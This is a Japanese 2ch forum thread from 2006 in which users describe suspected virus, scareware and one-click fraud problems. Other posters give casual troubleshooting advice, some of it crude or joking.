初書き込み失礼します PCを起動したら 「危険なファイルを発見しました」の小窓 「貴方の行動はつつ抜けで…」とか表示されて ドライブクリーナーってソフトをダウンロードして 実行しますか? って表示されました。 わけがわからなくて不安 起動するたびに出るのですがどうすればいいのでしょうか…
117 :
名無しさん@お腹いっぱい。 :2006/11/21(火) 22:59:06
118 :
名無しさん@お腹いっぱい。 :2006/11/21(火) 23:00:05
やめとけ。新手の詐欺だ。 ドライブクリーナーがウイルスソフト。 ググルと何か出てくるだろ。 あまり変なサイトを見て回るなよ。
119 :
名無しさん@お腹いっぱい。 :2006/11/21(火) 23:08:48
>>117 ううう…; 自分全くの初心者なのでよく分からない…orz
正直怖いです…;
>>118 そうなのですか?
はい、以後気をつけます;;
ありがとうでした^^
ここ壊れてますって出てワラタ 専ブラ使ってたんだって気が付いた
なにをしたからそうなったのかわからないが CD/DVDドライブがいかれ、外付けHDDが動かなくなり、wi-fiコネクタが認識されなくなった HDD内には見慣れないファイルがありそれを確認したのが昨日の夜、再起動後には認識されなくなったというか 電源が入らないので確認のしようがない。CDドライブの方もコツンコツンと一定の間隔で音が鳴り読み込みができない状態に これらはなんらかのウイルスに感染してる可能性があるのでしょうか? 【使用OS】XP 【WINDOWS UPDATE】している 【ウィルスソフト】Avast 【UPDATE】している 【スキャン】Windows Live OneCareのフルスキャン、Ad-Aware SE Personalをたまに 【とった処置】特にしていない
>>122 それだけでは何とも・・・
別機でウィルスチェック等して試すか、ドライバ関係を一旦削除して
再起動で確認
単にHDDの電源が逝かれた場合は中身抜いて
別のストレージケースにでも放り込んで確認
カスペルスキーやってみたがこれって検出するだけなのか 問題になりそうなものは出てこなかったが何が原因なんだろう
∧_∧ ( ´∀`) ハードトラブルの可能性の方が高そうですよ ( ) まずは、BIOSで各デバイスを認識できてるかでしょうね | | | (__)_)
128 :
名無しさん@お腹いっぱい。 :2006/11/23(木) 15:19:07
ウィルスみたいなプログラムを起動してしまいました。その後、IEとかを起動しようとするとWindowsインストーラが繰り返し起動して、マイクロソフトオフィスを設定してますとかなるんですが、どうすればよいでしょうか?
130 :
名無しさん@お腹いっぱい。 :2006/11/23(木) 18:25:19
TSPY_LOOK2ME.Lっていうスパイウェアがどんなものか教えて頂けませんか。 トレンドマイクロのデータベースが使いづらくて見つからないんです。
131 :
名無しさん@お腹いっぱい。 :2006/11/23(木) 18:27:43
できればトレンドマイクロのデータベースでピンポイント検索 できる方法も教えて頂けると有り難いです。 TSPY_LOOK2ME.Lと打ち込んで検索してみても 全く関係のない名前のものまで1000件以上出てきてしまうんです。
>>131 tp://www.trendmicro.co.jp/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY%5FLOOK2ME%2EL
>>132 は質問者の意向を無視した回答をする無責任なオナニー野郎
すみません。わたし女です。。。
136 :
131 :2006/11/23(木) 21:02:51
>>132 スキャンはトレンドマイクロでできたんだけど、
さっきのスパイウェアが見つかったから
どんな特徴があるのか調べてみたかったんだよ。
他にもデータベースが無いか探してみるね。
>>133 ありがとう。感染報告ゼロなんだね。
個別の具体的な特徴が知りたかったのに。
やっぱパスワードとか暗証番号盗まれたかな。不安。
137 :
名無しさん@お腹いっぱい。 :2006/11/23(木) 23:23:46
138 :
名無しさん@お腹いっぱい。 :2006/11/23(木) 23:32:05
だれかー
139 :
名無しさん@お腹いっぱい。 :2006/11/23(木) 23:52:05
140 :
名無しさん@お腹いっぱい。 :2006/11/23(木) 23:53:15
141 :
名無しさん@お腹いっぱい。 :2006/11/24(金) 02:33:50
度々スイマセン。128です。 その.exeは削除して、ウィルススキャンもスパイボットも異常なしなんですが、勝手にWindowsインストーラが起動してしまいます。IEもコントロールパネルも開こうとするたびにインストーラがでてきてしまいます。どうすればいいかまったくわからなくて・・・
143 :
名無しさん@お腹いっぱい。 :2006/11/24(金) 02:53:21
IEが起動しなくてネットに繋げないんです。メディアプレーヤーとかなら起動するんですが。ほっといても勝手にWindowsインストーラが起動しては→マイクロソフトオフィス2003を設定しています→情報を集めています→消える、を繰り返しています・・・
質問者は
>>1-8 のテンプレを読んでから質問するようにしてください。
また荒らし対策のため、質問する際にはトリップをつけるようお願いします。
>>143 【使用OS】
【WINDOWS UPDATE】
【ウィルスソフト】
【UPDATE】
【スキャン】
【症状】
【やったこと】
【とった処置】
を書いてください。
何が検出されて何を削除したのかわからなければ、具体的な回答は出来ません。
正常に動作していた時の復元ポイントがあれば、そこで復元してみるのも一つの手段です。
一般的な手法として、セーフモードでアンチウイルスソフトでスキャンする方法がありますが、それは試しましたか?
もしアンチウイルスソフトを入れていないのであれば、反省をしつつクリーンインストールをお勧めします。
145 :
名無しさん@お腹いっぱい。 :2006/11/24(金) 14:55:46
【使用OS】windows2000 【WINDOWS UPDATE】SP4 【ウィルスソフト】Norton AntiVirus,Internet Security 【UPDATE】自動 最新 【スキャン】完全スキャン ウィルスなし 【症状】ムービーファイルやmp3ファイルがaviに変換されて Dドライブをいっぱいにする。起動後直後にされていた らしく、起動直後よりCPUが100%で何もできなかった。 初めはただPCが重いだけだとおもっていたため。 【やったこと】変換されたファイルをすべて消した。その後通常である。 【とった処置】nortonで完全スキャンしたが特にウィルスらしきものは見つからなかった。 こんなウィルスの情報を教えてください。
146 :
名無しさん@お腹いっぱい。 :2006/11/24(金) 15:02:24
助けてください。 ウイルスが見つかりました。どうやらトロイの木馬らしいです。 ウイルスバスター2004を使ってます。 トレンドマイクロには 検出時の処理:感染ファイルを隔離できませんでした。 となってます。なんか10ぐらいでてきてて、 ウイルス名はTSPY LINEAGE.BDPです。 バスターかけてますが、また2個でてきました。 どうしたらいいのか教えてください。
ケツにネギ突っ込んで寝れば直るらしいよ
149 :
名無しさん@お腹いっぱい。 :2006/11/24(金) 15:16:31
>>148 固まって動かせない状態に…
バスター終了して6こウイルスが!
タスクマネージャが大量出現
もうどうしたもんだか
バスターでチェックしたファイルでウィルスが検出されてそのファイルが削除されるんだけど、 その直後にカスペでチェックするとバスターのフォルダ内にさっき削除したと思われる 感染したファイル(名前・形式が変わっていてサイズが同じ)がまた検出されるんだよね。 これってバスターで削除したと思わせて実はバスターフォルダ内に感染って仕組みなのかな? それともバスター自身がフォルダ内に移すっていう仕組みなのかな? もしそのまま放っておいたらどうなんだろ・・・・
隔離されてるんでしょ
>>151 たぶんそうかなとは思ったけど、
隔離されれば他ソフトで検出されても問題ないんかな?
>>152 当たり前だろ.....
何の為の隔離だよ.....
154 :
名無しさん@お腹いっぱい。 :2006/11/24(金) 19:21:29
あげ
>>149 リカバリが手っ取り早い
タスクマネージャで片っ端から停止させながら
手動削除後にアンチウィルスソフト使用では?
>>150 カスペでチェックする前にPCを再起動させてないので
削除したはずの感染ファイルが検出されてるだけ
【使用OS】 XP 【WINDOWS UPDATE】 SP2 【ウィルスソフト】 ノートン 【UPDATE】 してるはず 【スキャン】 最近してない 【症状】 パソコンを立ち上げるとWindowsの読み込みが終わったあと画面が真っ暗になり 中心にドクロの絵が表示されて、何も操作ができなくなる。 【やったこと】 セーフモード→意味ない セーフモードに入らずシステムの復元→意味なかった 【とった処置】 とりあえずどうしようもないので何かこの症状について情報知ってる方いたら 何でもいいんで教えて下さい。因みに"ドクロウイルス"ではないと思います。
>157 >セーフモード→意味ない 「セーフモードで起動してもドクロが出てきます。」と言う事だね。 >セーフモードに入らずシステムの復元→意味なかった ダメ元で↓試せ 「セーフモード と コマンドプロンプト」 ↓ Administratorまたは管理者権限のアカウントでログイン ↓ explorer.exeの変わりにcmd.exeを読みこむ(コマンドプロンプト起動・デスクトップ真っ暗) ↓ 以下の文字を打ちこんで「Enter」 ↓ %systemroot%\system32\restore\rstrui.exe(←システムの復元起動コマンド)
>>158 レス有難う。「セーフモード と コマンドプロンプト」 →死んだorz ドクロちゃんは健在。
初期化する前に、最後の手段として、別HDDにOSインスコしてそこからドクロHDDの中身を覗いてみるよ。
>>159 妹のパソコンだからよく分からん。でもやったことはあるが、最近はやってなかったらしい。
呼ばれて行ってみたら、既にドクロフリーズ状態。
161 :
名無しさん@お腹いっぱい。 :2006/11/25(土) 01:52:48
ちょっと教えてください。 リカバリー用にバックアップをしたいのですが ウイルスソフト(ノートンインターネットセキュリティー)を バックアップする最適の方法をご教示ください。 (ウイルスソフトの空白状態を最小にしたいので)
>>161 シマンテックから最新の定義ファイルを事前に
落しておけばいいのではないでしょうか
【使用OS】XP 【WINDOWS UPDATE】してない 【ウィルスソフト】カスペ、バスター2005 【UPDATE】なし 【スキャン】たまに 【症状】すべての動作が重くされ、ほぼ、なにも出来ない状態orz 【やったこと】前にnyを使っていた 【とった処置】セーフモードでカスペでスキャン アンチニイ、トロイ、キンタマが検出されましたが、状態変わらず(つД`) 初期化するしかないでしょうか?
>>164 これは・・・無理!
OSのクリーンインストールだね
そして次回からはnyはやらない
やるにしてもWINDOWS UPDATEしてなきゃ、感染させて下さい状態だし
166 :
名無しさん@お腹いっぱい。 :2006/11/25(土) 03:16:36
>163 これがあればウイルスなんか怖くなくなりますね。 結局、怖い=面倒、なんですよねw
167 :
164 :2006/11/25(土) 03:26:38
>>165 さん速答ありがとうございます!
やはり、そうですかorz… 重くて色んなデータのバックアップが取れない状態で
しぶってます(つд⊂)
>>161 脳豚教授はウィルスソフトではなく、セキュリティソフトです。
>>163 たぶん こに書き込むくらいただか
"ウイルス感染したのでバックアップ" じゃないでしょうか?
これじゃウイルス入りのイメージ作っちゃいます。
このてのソフトでは g4l がおすすめ。
勿論 健康な状態でのバックアップの話しです。
初めまして。私の友人がウィルスによりPCを壊されたと聞いたので 詳細なんかはわかりませんが、もしよろしければ答えてくださるとありがたいです。 友人の話では、家から帰宅後PCをつけ、メールチェックを行った後 一旦PCから離れようとした瞬間突然PCが再起動し ウィンドウズが立ち上がる所にドクロのマークがついて動かなくなったという話を聞きました。 私も友人のPCを触った事はないのでまったくわからないのですが リカバリーをしても直らないそうで・・・もし知っている方がいらっしゃいましたら 何かきかせてはいただけないでしょうか?どうかお願いします。
>170 「メールチェックの時に何をやったか」を聞いとけ
>>171 メール着てないか確認しただけで、特に何もやっていないそうです。
カボスで出回り始めた新種のようだな Alt+F4連打で起動はできるようだがソフトは何も使えないらしい かなり強烈なウイルスだな 感染元のファイル名おしえてくれ
突然再起動し動かなくなったそうなので、感染元ファイルもウィルス名も 何もわからないんです・・・。とてもムチャな質問ですいません。 やはり買い換えたほうがよろしいのでしょうか?
>173 >Alt+F4連打で起動 参考にしときたい なんていう起動方法?(前回正常起動とかデバッグモードとか)
176 :
173 :2006/11/25(土) 20:38:33
>>174 >>157 と同じかな?
友人はリカバリーの意味を勘違いしていると思われ。
リカバリーとはフォーマット(全てのファイルやフォルダをOS上から認識できなくなる)してから新規にファイルを書き込むこと。
BIOS感染型以外ならこれでOK
手に負えないなら新規購入よりはるかに安価なので購入店でリカバリ依頼なりメーカーに修理に出す。
>>177 >>157 の症状と同じみたいですね。ログを読まずに書き込んですいません。
友人には修理に出すように言ってみます。どうもありがとうございました!
>176 そっか…俺も何かあったときに、その方法試してみよう。 ありがと。 戻って>170 起動したとき、どこまで起動できる?
>>178 ダウソをちらっとのぞいてみたがどうも潜伏期間があってその後発動するらしい
友人にカボスやめれと言っときな
181 :
名無しさん@お腹いっぱい。 :2006/11/25(土) 21:27:05
182 :
180 :2006/11/25(土) 21:35:36
>>182 わざわざありがとう、早速読んでくる。
シェアはやってないけどこんなの貰ったら大変だもんな・・・・勉強しとく。
感謝、感謝!
184 :
名無しさん@お腹いっぱい。 :2006/11/26(日) 01:38:45
名前もわからないおかしなウィルスに感染してこまっています。友達から変なURLがメッセンジャーで送られてきて、 インストールしてしまったら、感染したという感じです。 症状はメッセンジャーもひらいていないのに勝手にサインインをしてそのときオンラインのメンバー全員に、 そのURLを貼り付けて送るというものです。なぜかそのURLは私の発言になってしまうのです。 それを私にくれた友達も同じ状態で私に送ってきたそうです。 デスクトップにwinstallと名前の書かれた変なソフトがあって、それが勝手に働いておかしくなるんですけど、 何回ためしてもそれを削除することができないのです。 やったことは、それを削除しようとしただけです。しかし、このままにするとすごい人数に被害かかかるので今すごく 困っています。対処法を知っている方がいたら教えてください!!
>>184 【使用OS】
【WINDOWS UPDATE】
【ウィルスソフト】
【UPDATE】
【スキャン】
【症状】
【やったこと】
【とった処置】
>友達から変なURLがメッセンジャーで送られてきて、インストールしてしまったら、感染したという感じです。
変な物は知人から送られてきても実行しないのが基本です。
少し古めのウイルスのような気がしますが、セキュリティソフトは最新の定義にしていますか?
ドクロちゃんだがファイル名を指定して実行からコマンドプロントを起動するのはできるようだ そっからレジストリエデイタを起動してスタートアップの自動起動エントリまわりのあやしいやつを削除ってのはどう? しかしスタートアップに登録されてないって書き込みもあるし かなりやっかいなブツだな p2pやってない人の感染報告もあるようだが シェアウエアなのにいつまでも金はらわねえと同じような症状になることもあるらしい まあ p2pやらワレズウイルスは完全自己責任ですね
【使用OS】XP home edition sp1 【WINDOWS UPDATE】いくつかのソフトウェア更新以外は 済 【ウィルスソフト】avast! 【UPDATE】最新 【スキャン】フルスキャン済 【症状】 IMEの単語登録が1年ほど前の状態に突然巻き戻りました。 最初はIMEの不具合でそういうこともあるのかと思ったのですが 今さっきサクラエディタの設定も巻き戻ってウイルスの挙動なのかと思い書き込みました。 【やったこと】 とりあえずそういうウイルスがあるのかと思って検索したのですがうまくしぼりこめず・・ 【とった処置】 設定ファイルを巻き戻す(初期化する?)こんなウイルスはあるんでしょうか?
>>189 のー
そんなウイルスもどきじゃなくてでかいところがからんでるような希ガス
経済産業省のニュースリリースに例として同じ症状がかいてあった
感染報告が極めて少ないウイルスであるにもかかわらず だ
192 :
名無しさん@お腹いっぱい。 :2006/11/26(日) 17:17:56
自分のブログのアクセス解析ページを見てみると、 article/unicom:download/start なんてものがでます。 自分で作成したものでもないし、このページをクリックすると 「削除または移動された可能性があります」と表示されます。 これって何なんですか?
193 :
名無しさん@お腹いっぱい。 :2006/11/26(日) 17:56:14
すいません・・・・ 変なワンクリックに引っかかったのですが どうすればいいのでしょうか・・・・
>>193 心配性なくせしてエロサイトでも覗いたか?
骨の髄までしゃぶられるか、無視するかの二つに一つだろ?
195 :
名無しさん@お腹いっぱい。 :2006/11/26(日) 18:13:04
トロイの木馬って何ですか〜〜?
198 :
名無しさん@お腹いっぱい。 :2006/11/26(日) 18:18:20
>>194 レスありがとうございます。
恥ずかしながら、お察しのとおりでございます・・・
ボケェ〜っとしてて、長いPOP UPの内容を読んでいませんでした。
単なる年齢認証だと思い、ok押したら、いきなりホスト情報が抜かれて
「登録完了」の画面になり、IPとか全部情報が出ていて、2日後までに
お金振り込めと・・・・・
無視してても大丈夫ですよね?
こんなバカをお助けください・・・・
>>198 IPからお前の情報が漏れるわけないだろ?
無視しとけよ
200 :
名無しさん@お腹いっぱい。 :2006/11/26(日) 18:24:42
>>199 あなたの一言に少し涙が出てきました。
本当にありがとうございます;;
>>198 無視無視。IPなんて晒してるんだから、表示されてもおかしくない。
住所や名前なんて分からんのだから。
捨てメアドから、クーリングオフでもしたらどうだ?(笑
202 :
名無しさん@お腹いっぱい。 :2006/11/26(日) 18:31:32
>>201 最初、それ考えたのですが、先ほど警視庁のHPでそれをやったら
いけないと書いてありました。
とにかく接触しないことですね。。
TVとか観てて「こういうのひっかかる奴いるんだな・・・」とか
冷ややかに観ていたら、まさか・・・あせりました。
お騒がせいたしました。板違いかも?にも親切に教えていただいて
本当に感謝しています^^
>>200 さっきは、チンポの先っぽから涙が出てたのにwww
心配すんなよ なんもありゃせんよ
204 :
名無しさん@お腹いっぱい。 :2006/11/26(日) 18:41:26
spybotやadawareをIEで検索してそのサイトにいくとIEが強制終了するのですが、これはウィルスでしょうか? 頻繁にsvhda.exeが強制終了みたいなメッセージが出てるのですが。
友達がIPからその人のパソコンに入るとかよく分からないこと言っていたのですがそんなこと簡単に出来るのでしょうか? 自分もとりあえずそんなことされたらたまらないのでウィルスチェックとかWinny?関連のこと初心者なり調べてみたのですがよく分からりません 何か詳しいことを教えて下さい よろしくお願いします
>>205 >よく分かりません
俺にだってポートが開いてなかったら何も出来ませんが?どうかした?
>>186 の上ふんだらsmaily sourceてのに 感染した( ゚д゚)、ペッ
>>206 さん
それはつまりポート?を開いてればいろいろできて開いてなければ見ることもできないってことでしょうか?
・・・申し訳ありませんがそもそもポートとはなんですか?
211 :
名無しさん@お腹いっぱい。 :2006/11/26(日) 20:01:38
今、まったく見覚えのない、添付つき・タイトルが英文のメールが来ました。 プレビューは切っており、開けないで削除しましたが、 万が一ウィルスメールでも感染は大丈夫でしょうか? (カスペのオンライン・スキャンでマイコンピュータをスキャンしても白でした) 一応NISのチェックを通過してるので、ウィルスメールでなく、 単なる誤配だったのでしょうか? それともどこかで情報が漏れて・・・ガクガクブルブル
212 :
211 :2006/11/26(日) 20:04:26
今時、添付つきメールなんて、怪しすぎですよね? もうどうしたら・・
メールを開いていなければ大丈夫です
添付ファイルつきの英文メールなんてまず間違いなくウイルスだろうからそのまま削除して正解 開かなければ感染はしない microsoft製のメーラー使ってんならupdateしとかないと開いただけで感染っつーのもあり得る 特にoutlookはやばい officeの脆弱性攻撃が流行ってるし
>>211 まずは
>>1 のテンプレ埋めれ
メールを受信して削除しただけなら感染することはない
ウイルスの可能性もあるしスパムの可能性もある
不正なアクセスがって表示されるんですがマジでどうしたらいいか教えて下さい!本当に困ってます よろしくお願いします!
>>216 おまいも
>>1 のテンプレ行き
「不正なアクセスが〜」って表示してるのはなんてソフトだ?
それからメッセージは省略せずにきちんと書いてくれ
すいません はじめてでめっちゃてんばってて 不正なアクセスがってのに対して みっつ対策があって アクセスを遮断しカスタマイズをするってのを押したらとりあえずとまったのですが
不正なクセうせスを削除するには言い留守のスキャンですかねええええ ばか9
>>220 すいません もし侵入された場合どこを確認すればよいでしょうか?
またすいません microsoft help hosting serverがアクセスしようとしてます って出てくるのですがどう対処したらよいでしょうか
>>222 だからなんてソフトがそのメッセージを出してるのか書けというに
それも含めて
>>1 のテンプレ全部埋めてこい
あのさ
>>1 のテンプレの指示通り書き込んでくれ。
でないと誰も、対処法を教えられない。
テンプレ 【使用OS】 【WINDOWS UPDATE】 【ウィルスソフト】 【UPDATE】 【スキャン】 【症状】 【やったこと】 【とった処置】
226 :
211 :2006/11/26(日) 21:19:36
>>213-215 すいません、はじめて添付ファイルつき英文メールを受け取ったので気が動転していました。
どうもありがとうございました。
NIS・・・ウイルスもスパムも拒否ってるはずなのに役立たず・・・。
本当にすいません パソコン全然詳しくなくて テンプレ 【使用OS】xp 【WINDOWS UPDATE】してないかもしれない 【ウィルスソフト】 【UPDATE】 【スキャン】 【症状】またすいません microsoft help hosting serverがアクセスしようとしてます 【やったこと それのアクセスを遮断 を選択 これで大丈夫でしょうか?詳しくわかったらまたかきます
nortonからのインターネットアクセス制御からの警告で アクセス許可するか遮断するかカスタマイズするか って出てきます 遮断のみ押すとなんかいも出てきて アプリケーション処理を常に使うを押すとしばらく消えます
お尋ねしても宜しいでしょうか。 【使用OS】 Windows XP SP2 【WindowsUpdateしてるか】 自動更新ですが、念のため週に1〜2回手動で確認しています。 【AntiVirusは何を使っているか】 WinAntiVirus PRO 2006 【ちゃんとUpdateしてるか】 はい、ちゃんと最新の状態に更新しています。 【スキャンした結果(ウイルス名・発見場所)】 発見できない。 【別のオンラインスキャンしたならその結果は】 シマンテックやバスターのオンラインスキャンでは、WinAntiVirus PRO 2006を検出 【症状を具体的に、分かる限りすべて書く】 WinAntiVirus PRO 2006を入れてから動作が悪くなった。 【何をしたらそんなことになったのか】 貴方のパソコンは「ブラックウォーム」に感染される恐れがある。 セキュリティセンターは貴方のパソコンに「セキュリティミッス」を検出しました。現在使っているアンチウィルスでは 情報の流出を防ぐ事ができないと言われた。 【これまでにとった措置】 怖くなってノートン2006を削除してWinAntiVirus PRO 2006をインストール 【その他の質問】 WinAntiVirus PRO 2006が世界最強のセキュリティソフトと聞いたので、クレカで購入しました。
3スレ前ぐらいでみたな
本当にこんなん引っかかるやついるんだな 何人目だよ
いや ふつうに釣りだとおもうが
すいません マジでどうしたらよいでしょうか 本当にお願いします
>>230 これは良い宣伝になりますね。これ以上被害者を増やさないための。
>>230 >「ブラックウォーム」
下手な翻訳ミスで「ブラックワーム」が正解
その程度の糞ソフトをよく使う気になったな
>>230 こりゃまたダイレクトな手法な釣りですなぁ〜
>WinAntiVirus PRO 2006が世界最強のセキュリティソフトと聞いたので、クレカで購入しました。
この最後の一文がまたアレですな(藁)
しつこいな、いい加減秋田 何度目だよ
240 :
名無しさん@お腹いっぱい。 :2006/11/26(日) 23:04:39
>>240 覚えのないメールは問答無用で削除しましょう
242 :
240 :2006/11/26(日) 23:09:19
今日PC変えて以来、(ウイルスソフトはマカフィー→ウイルスバスター2006に変更) MS02-039_SQL_SERVER_RESOLUTION_EXPLOIT とかいうウイルスを3回もオンラインで検出したんですが、、、 一体何なんですかコレ? 説明読んでも的を射た回答が無かったので。
>>246 セキュリティホールへの攻撃を防いだことを意味していますので特に対応の必要はありません。
心配する必要なし
248 :
名無しさん@お腹いっぱい。 :2006/11/27(月) 04:46:15
249 :
名無しさん@お腹いっぱい。 :2006/11/27(月) 04:50:19
一応プロバはカスペ、 自分はNISでメールチェックしているはず(NISでともにクリーン)なのですが・・・。
>>248 件名や内容はちと違うが、最近俺の所にも何件か来た。
簡単に言うと、今までおまいがメールを出した先の誰かがウイルスに感染しただけ。
そのウイルスがメールの履歴を見て、逆に送りつけてる訳だな。
添付ファイルは絶対に開けるな。即削除しろ。
>>248 ISP のメアドは匿名性がないよ。大抵、ISP のメアドは @ 以降のドメイン名が分かってる。
@ より前の文字列は英数記号で、まあ、総当たりでランダム文字列を作るだけで良かったりする。
Delivery Status Natification(Failure) のメールは、新手のスパムメール。
メールクライアントや Web メールによっては、Delivery Status Natification メールは自分で送ったものとして扱い、添付ファイルを表示してしまうものがある。
まあ、ほとんどは添付メールを表示しないので、見に覚えのないメールはさくっと消してしまのが良い。
253 :
名無しさん@お腹いっぱい。 :2006/11/27(月) 10:23:42
255 :
248 :2006/11/27(月) 11:15:43
>>250-252 どうもありがとうござます。
一回目と二回目の時間差が4時間ほどなので、同一人物ですかね。
記述忘れですが、一回目も添付つきメールでした。
こちらもスパムだといいのですが・・・。
NIS、安全なメールをスパム扱いしてるくせに、肝心のヤツを弾かないとはw
257 :
名無しさん@お腹いっぱい。 :2006/11/27(月) 12:24:45
うちのPCから「TSPY LINEAGE.BQA」の文字が… FILEが開かない… 修理ですかね
>>1 の記入項目も埋められないようならメーカー修理でいいよ
259 :
名無しさん@お腹いっぱい。 :2006/11/27(月) 18:02:05
私のパソコンも今日初めてドライブクリーナーを4.900円で購入しなさいと出ました。 『職業及び夫婦関係を危うくするインストール済みファイルの正体が おそらくわからないでしょう。こういうファイルは、ネット動作記録 を残して、あなたのクレジットカード情報を危険にさらすこともできます。』 と出て不安です。 アダルトサイトを観たせいで、とか書かれていますが、アイドルのコンサートやCMの動画を 観ていただけで、そんな覚えもありません。 しばらく様子をみてインストールしたソフトを削除しようと思っていますが。 ノートンのアンチウィルスの完全スキャンかけてみます。 何か情報をお持ちの方、教えていただければ嬉しいのですが、、 宜しくお願いします。
>>186 の上ふんだら
>>207
と同じのに感染しました
当方カスぺいれてるんですが・・・
調べたらXcleanデラックス版でのみ除去できるようですが
ほかに除去しようないですか?
すいません教えてください
>>262 Detected Smiley Source:
Registry Keys (2) :
HKEY_CLASSES_ROOT\typelib\{eddbdea4-5c07-453f-be8c-81d738984381}
HKEY_LOCAL_MACHINE\Software\Classes\TypeLib\{eddbdea4-5c07-453f-be8c-81d738984381}
CLSIDs (1) :
{eddbdea4-5c07-453f-be8c-81d738984381}
初心者なんでうupのしかたよく
わからないです
上はXceranearでの検出結果です
○ ⊂⊃ ⊂⊃ /~~\ ⊂⊃ 林林............,,,,傘傘傘::::::::傘傘傘.........林.林... zzzzzzzz........... _,,..,,,,_ 、, ,,, 、,, ./ ,' 3/⌒ヽ-、_ 、 ,, @ 、, /l. /____/ ヽ|ノ,, @ ,,, 、,,  ̄,, ̄ ̄ ̄ ̄,, ̄ ,,, 、,, ヽ|ノ 、、, ,, 、,, , " ,, 、、, ,,
>>261 >
>>186 >の上ふんだら
>>>207
>と同じのに感染しました
て書いてあるけど、もしかして、パンダのオンラインスキャンしたらsmaily sourceが検出されたってこと?
>>265 違いますURL踏んだ クリックした時点
で感染しました
>>266 >感染しました
これはどうやって判明したの?
268 :
267 :2006/11/28(火) 04:32:29
>>267 の質問は撤回させていただく。
これより急遽仕事に出かけねばならなくなったので。
ではこれにてシツレイさせていただく。
>>267 常駐カスパでそのurl踏んだら
駆除することができませんでしたなんたらでて
いろんなオンラインスキャンためして
xcleanerで感染判明しました
270 :
名無しさん@お腹いっぱい。 :2006/11/28(火) 04:44:33
現在俺のパソコンがひと月ほど前からおかしくなっている。 昼間、パソコンを立ち上げると一分も経たずして勧誘の電話があちこちからかかってくるように なった。墓地だったり証券だったり業種は様々だが明らかに俺の電話番号とパソコンの動作が リンクするようになっている。偶然の域をとっくに超えているので、どうやって俺が家にいること 知ったんだ、と勧誘業者に噛み付いたこともある。もちろん答えなど言うはずはないが。 また、ネットに繋ぐのにもとんでもない時間がかかる。フリーズばかりする。 らしいです・・
272 :
名無しさん@お腹いっぱい。 :2006/11/28(火) 05:19:40
すいません、こんな早朝に 至急、教えて戴きたいことがあります エロサイトを見ていて、 マイクロソフト〜からウィルス警告が出てしまいました システムエラーが発見され至急、修理しなければ〜というような内容なのですが ウィルスソフトを購入しなさいというページに繋がります これは購入して修理した方が宜しいのでしょうか? クレジットカード記入欄があり、躊躇しています どなたかお教えお願いします
それ、詐欺だから思い止まって。 どっちにしろ、カード使わないでノートンとかバスターはお店で買ったほうが良いよ。 来年には更新の手紙来るから、それをコンビニで払えば安くなるし。
274 :
名無しさん@お腹いっぱい。 :2006/11/28(火) 05:54:13
ありがとうございます かなり、しつこく出てくるので マイクロソフトの警告とばかり思ってしまいました 詐欺なんですね 警察に相談してみます
>>274 別に相談しなくても...
しかとすればいいじゃん
276 :
名無しさん@お腹いっぱい。 :2006/11/28(火) 06:17:16
カード情報書いてしまった後なんです・・ こういう場合、どうしたらいいでしょうか?
カードを使えないようにカード会社に連絡する もう二度とオンラインでカードなんか使わない 怪しい物には手を出さない #最近は小学校でも教わるレベルの話だろ それ
>>274 相談して来い
きっとそんな調査に無駄遣い出来ないと上のやつらに直ぐに握り潰されるから
日本は遅れているんだよ
昔は、困ったら警察に相談しなさいと言われたものだが、
実態が解明されるにつれ当てにならない代名詞になりつつある
人が殺されなきゃ今では動きもしないとんでもない治安機関だ
279 :
名無しさん@お腹いっぱい。 :2006/11/28(火) 15:40:45
>>260 259です。アドバイスありがとうございました。
教えて頂き助かりました。
ノートンで削除し、『プログラムと削除』でもアンインストールしたら
画面に出なくなりました。
不安にかられ購入せずに済みました。感謝申し上げます。
>>279 そうだろう
目に見えなくなったら、もう感染していないと思っているんだよね
そんなあなたのパソコンはもうウィルスまみれだ
>>279 悪い事は言わねぇ
初心者のうちはウィルスはスパイウェアに感染したと思ったら即効でリカバリしとけ
自分を含めて被害を最小限に食い止める意味でもな
先ほど、AntiVirがC\Program Files\Lhaplus\Lhaplus.exeを「TR/Dldr.Stration.I」 として検出したのですが、誤検出だと考えてよろしいでしょうか?
だな updateせよ
お前ら二十歳すぎて何やってんの? もちろん現実世界でしか生きてこなかった純情な人にとっては過酷だけど ネットってそういう世界だよ。騙し合いの世界。それは契約社会とは程遠いところにある。 出てくる情報全てが嘘だと疑うことから始めれ。 そしてこっちからわざわざ個人情報を与える必要はない。
ああいう馬鹿は漢字が多いと読めないよ。
>>284 すべては信じることからはじまると思うんだが
>>284 騙しには騙しのテクニックがある。
あらゆる分野に長けている人間を騙すには、疎い分野を見付けなければならないが、
必ずそれは論理破綻している。
そいつらよりも利口になればいい事だ。
携帯からですPC機動できなくなりました助けてください 【使用OS】 WIN MX 【WINDOWS UPDATE】 してます 【ウィルスソフト】 Kaspersky 【UPDATE】 してます 【スキャン】 ――― 【症状】 起動不可セーフモードも 【やったこと】 電子メールを実行 【とった処置】 再起動したら起動不可になった
>>288 いま流行っているwhiterの亜種にひっかかったんじゃね
nyとかMXとかしてたらの話だけど
>>288 ハイ おしまい
何故起動不能なのかがわからないから、
レジストリハイブのバックアップがなければ無理。
回復コンソールを使ってこれらを書き戻す。さいなら〜
【使用OS】 WIN MX て何?
294 :
288 :2006/11/28(火) 21:56:51
>>288 Meなら・・・寿命です
MXなら・・・板違いです
>【ウィルスソフト】 Kaspersky このウイルスが問題なんだろ?
謎のOSなんだからメーカーに聞くのが本筋
>>288 を正しく修正してみました
使用OS】 WIN MX
【WINDOWS UPDATE】 してます
【ウィルスソフト】 Antinny
【UPDATE】 してます
【スキャン】 ―――
【症状】 起動不可セーフモードも
【やったこと】 Antinnyを実行
【とった処置】 再起動したら起動不可になった
なんだ釣りか
300 :
288 :2006/11/28(火) 22:11:59
>>296 ウイルスではないと思います
正しく書きますとKasperskyエンジンのソフトです
久々にワロタ OSにWINMXってあったんだね! 鼻から焼酎吹いた 粘膜の洗浄になったよ サンキュウ
ノートパソコンかい? 先日電池パック死んだんで焦ったが、電池パック抜いてアダプターから電源確保したら起動できました。 ウイルスが原因なら今、わたしが書いたことはスルーしてください。
303 :
288 :2006/11/28(火) 22:20:22
ダチに聞いたら前回正常起動時の構成で起動できないのかと言われてやってみたのですが 起動できませんでした 真っ暗なまま止まります 英語の変な文字がでてきます
【使用OS】 WIN MX ↓ 使用OS】 WIN MX ↓ 【 が無くなったって事は OSがバージョンupしたか?
電子メールを実行とかOSがMXだとか英語の変な字が出てきますとか お前の脳がウイルスに犯されてるんじゃないか?
306 :
288 :2006/11/28(火) 22:34:41
